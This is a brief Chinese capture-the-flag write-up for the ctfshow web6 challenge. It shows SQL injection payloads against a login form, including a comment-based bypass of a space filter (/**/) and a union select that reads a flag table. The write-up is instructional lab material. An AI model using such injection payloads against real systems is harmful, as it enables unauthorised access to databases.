ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
计算机鬼才~3 小时前
网络安全·第二天·ARP协议安全分析
网络·安全·web安全·arp
扫地僧0093 小时前
大模型在网络安全领域的七大应用
人工智能·安全·web安全·自动化·大模型·deepseek·微调参数
浩浩测试一下5 小时前
网络安全中信息收集需要收集哪些信息了?汇总
安全·web安全·网络安全·oracle·sqlite·系统安全·可信计算技术
sszdlbw5 小时前
BUUCTF-web刷题篇(19)
web安全·web·安全漏洞·buuctf
Bruce_Liuxiaowei6 小时前
网络安全应急响应-启动项和任务计划排查
安全·web安全
一口一个橘子7 小时前
[ctfshow web入门] web40
前端·web安全·网络安全
grrrr_19 小时前
【ctfplus】python靶场记录-任意文件读取+tornado模板注入+yaml反序列化(新手向)
python·web安全·tornado
网络安全工程师老王10 小时前
clickhouse注入手法总结
数据库·clickhouse·web安全·网络安全·信息安全
Factor安全19 小时前
CVE-2025-24813 漏洞全解析|Apache Tomcat 关键路径绕过与RCE
安全·web安全·网络安全·tomcat·apache·安全威胁分析·安全性测试
QQ_77813297420 小时前
网络安全应急响应之文件痕迹排查:从犯罪现场到数字狩猎的进化论
web安全